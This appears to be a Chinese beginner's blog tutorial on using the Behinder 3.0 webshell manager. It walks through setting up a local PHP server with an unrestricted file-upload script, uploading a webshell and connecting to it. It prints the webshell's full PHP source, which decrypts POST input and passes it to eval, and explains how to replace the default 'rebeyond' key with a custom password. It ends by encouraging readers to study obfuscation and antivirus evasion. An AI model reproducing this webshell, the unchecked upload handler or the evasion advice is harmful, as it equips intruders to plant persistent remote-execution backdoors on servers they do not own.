冰蝎3.0的使用方法与默认密码更改方法
前言
今天刚下载了最新版的冰蝎3.0 beta2,但是一直连不上,后来问了公司的大哥才知道了原因,这里做一个记录,希望对你有所帮助。
这篇文章比较基础,主要面向新手,技术含量较低主要为操作流程。
首先看看下载后有什么文件:
server文件中放的是各种语言的webshell,如下图:
环境配置
这里我使用的php的webshell做的实验。首先我开了一个windows的虚拟机,下载了phpstudy,开启了apache,然后写一个文件上传的php代码,这里采用的是菜鸟教程上自带的php文件上传代码,具体代码如下:
<!-- index.html代码 --><html>
<head>
<meta charset="utf-8">
<title>Upload</title>
</head>
<body>
<!-- 下面表单表示将接收到底文件传给upload_file.php去处理 -->
<form action="upload_file.php" method="post" enctype="multipart/form-data"> <label for="file">文件名:</label><input type="file" name="file" id="file"><br><input type="submit" name="submit" value="提交">
</form></body>
</html>
// upload_file.php
<?php
if ($_FILES["file"]["error"] > 0)
{echo "错误:" . $_FILES["file"]["error"] . "<br>";
}
else
{echo "上传文件名: " . $_FILES["file"]["name"] . "<br>";echo "文件类型: " . $_FILES["file"]["type"] . "<br>";echo "文件大小: " . ($_FILES["file"]["size"] / 1024) . " kB<br>";echo "文件临时存储的位置: " . $_FILES["file"]["tmp_name"];
}
move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $_FILES["file"]["name"]);
echo "文件存储在: " . "upload/" . $_FILES["file"]["name"] //文件会被上传到当前目录下的upload文件夹中
?>
将上诉代码放在:
只要下载了phpstudy应该就会有这个文件夹,我使用的是默认目录安装的,upload_file.php代码写到上传的文件需要被放在当前目录下的upload文件夹中,因此我们需要自己创建一个upload文件夹,如上图所示。
连接webshell
上传页面如上图所示,点击chose file选中文件,点击提交上传我们的php的webshell即可,上传成功这会出现下图。
这时候双击打开我们的冰蝎:
如果无法打开可能是java版本不对,这里我给出自己的java版本作为参考。
打开后如下图所示:
在空白处右键然后点击新增:
输入url跟密码然后点击保存
这里面说一下为什么默认密码为什么是rebeyond还有怎样更改默认密码:
先看看冰蝎的phpshell的源代码:
<?php
@error_reporting(0);
session_start();if ($_SERVER['REQUEST_METHOD'] === 'POST')
{$key="e45e329feb5d925b"; //这一行为密码的md5的前16位$_SESSION['k']=$key;$post=file_get_contents("php://input");if(!extension_loaded('openssl')){$t="base64_"."decode";$post=$t($post."");for($i=0;$i<strlen($post);$i++) {$post[$i] = $post[$i]^$key[$i+1&15]; }}else{$post=openssl_decrypt($post, "AES128", $key);}$arr=explode('|',$post);$func=$arr[0];$params=$arr[1];class C{public function __invoke($p) {eval($p."");}}@call_user_func(new C(),$params);
}
?>
跟我在代码中标注的一样
$key=“e45e329feb5d925b”; //这一行为密码的md5的前16位
我们去cmd5这个网站中去进行加解密操作,输入rebeyond:
发现rebeyond的32位md5的前16为刚好就是代码中的key的值(是第一行md5(rebeyond,32))。现在大家应该知道怎么改密码了吧,只要用你想用的密码的md5的前16位代替代码中key的值,然后你就可以使用自己的密码登陆shell了。例如你想使用admin当密码,你求出的admin的md5如下:
这时候你只需要将代码中的 “ $key=“e45e329feb5d925b”; “ 中key的值改为21232f297a57a5a7即可使用admin为密码登陆,说到这里就已经很详细了,点到为止。
冰蝎页面
连接成功后页面如下:
大家可以根据自己的需要去使用,不过建议大家有机会研究一下webshell的混淆与免杀,否则很容易被查杀。
冰蝎3.0的使用方法与默认密码更改方法相关推荐
- base64还原_冰蝎3.0流量分析与还原
希望这篇文章可以真正帮助那些被打穿的单位识别与溯源. phpshell 与冰蝎2.0在建立连接时随机生成AES密钥同时明文交换不同是,冰蝎3.0的AES密钥为连接密码32位md5值的前16位,默认连接 ...
- 冰蝎v4.0.6下载及使用方法
冰蝎v4.0.6下载地址:https://github.com/rebeyond/Behinder/releases/tag/Behinder_v4.0.6 下载完之后打开Behinder.jar 1 ...
- 冰蝎Behinder_v4.0
目录 一.冰蝎4.0☕️ 二.流量特征问题☕️ 三.工作流程☕️ 四.演示过程☕️ 五.流量检测☕️ 一.冰蝎4.0☕️ 冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端,由 ...
- 冰蝎v4.0已经更新,在Java18下也能启动冰蝎。
因为冰蝎需要JavaFX库,java11以上已经删除了这个库,所以直接就使用高版本的java运行不了冰蝎. 那只能去下载FX库,百度上全是广告,直接谷歌上一搜索就出来了 地址:https://gluo ...
- 红队大杀器 Behinder_v4.0(冰蝎4.0)
Behinder_v4.0 GitHub : https://github.com/rebeyond/Behinder/releases/tag/Behinder_v4.0 修复 1.修复了在zimb ...
- Shell管理工具流量分析-下(冰蝎 3.0、哥斯拉 4.0 流量分析)
书接上篇,再分析冰蝎 2.0 之后来看一看 3.0 拥有那些新特性 文章目录 冰蝎 3.0流量 功能原理分析 哥斯拉 使用介绍 PHP加密器分析 推荐阅读 冰蝎 3.0流量 冰蝎 3.0 PHP sh ...
- mysql workbench 修改密码_MySql8.0以上版本正确修改ROOT密码的方法
部署环境: 安装版本red hat Cent 7.0 MYSQL 版本 8.0.2.0 成功部署完毕后出现故障情况: 1. 正常启动MYSQL服务后,敲Linux中root账户和密码进入不去 ...
- 冰蝎3.0 页面存在,但是无法获取密钥
下载链接:https://github.com/rebeyond/Behinder/releases 此次改版较大,更新日志: 我在尝试时PHP马时,一直都在报错: 于是我去github下查看issu ...
- n.m8yun.com/list/sy.php?p=1,开胃菜:冰蝎2.0流量分析
#coding:utf-8 import base64 from Crypto.Cipher import AES import binascii import json #注:python3 安装 ...
最新文章
- (0050)iOS开发之钥匙串存储
- python装饰器-python修饰器(装饰器)以及wraps
- tableau必知必会之如何在同一视图中进行相同分析维度图表的切换
- 机房空调制冷、加热、加湿、除湿这些功能如何应用?
- 创新设计模式:单例模式
- 程序员只能吃青春饭?老程序员爆料花样出路
- 开启Windows或者Mac OSX 本地服务器 (非安装第三方服务器软件)
- 卓越、当当、京东三大广告联盟比较
- 资源环境承载力和国土空间开发适宜性之水环境容量评价
- 《程序员健康指南》读书笔记
- 流量卡之家:AI、无人机、物联网、自动驾驶 未来取决于5G
- 腾讯开源Spring Cloud Tencent 是什么
- 新书推荐:《AI 3.0》
- Spring项目启动报错No qualifying bean of type [xxx] available: expected single matching bean but found 2
- python设置变量age和tall的值、编写一个_Python变量学习
- 加利福尼亚大学圣地亚哥分校计算机科学专业,美国加州大学伯克利分校计算机专业排名一览...
- 3D-HEVC解码器一
- 微信小程序之首页轮播图片自适应高度
- 【算法】二分法多种情况详解
- 索尼 电视 android 8,索尼4K液晶电视X9500G采用安卓8.0智能系统 是游戏爱好者的最佳选择...
热门文章
- successful sensing probability
- JavaScript提取JSON信息并输出为html
- Excel系列-1.Excel引用
- Postgresql error could not pull up equivalence class using projected target list (pathkeys.c:1330)
- HDU-5927-Auxiliary Set(树上DP+xjb操作)
- 卢松松博客模板php,卢松松博客Zblog主题模板PHP程序SEO效果好的主题模板
- 怎样使用NLPIR平台进行文本分析
- 创建采购订单(订购单)
- docker+Battery Historian 环境搭建(电量分析)
- 市场聚焦:美国民用安防DIY需求大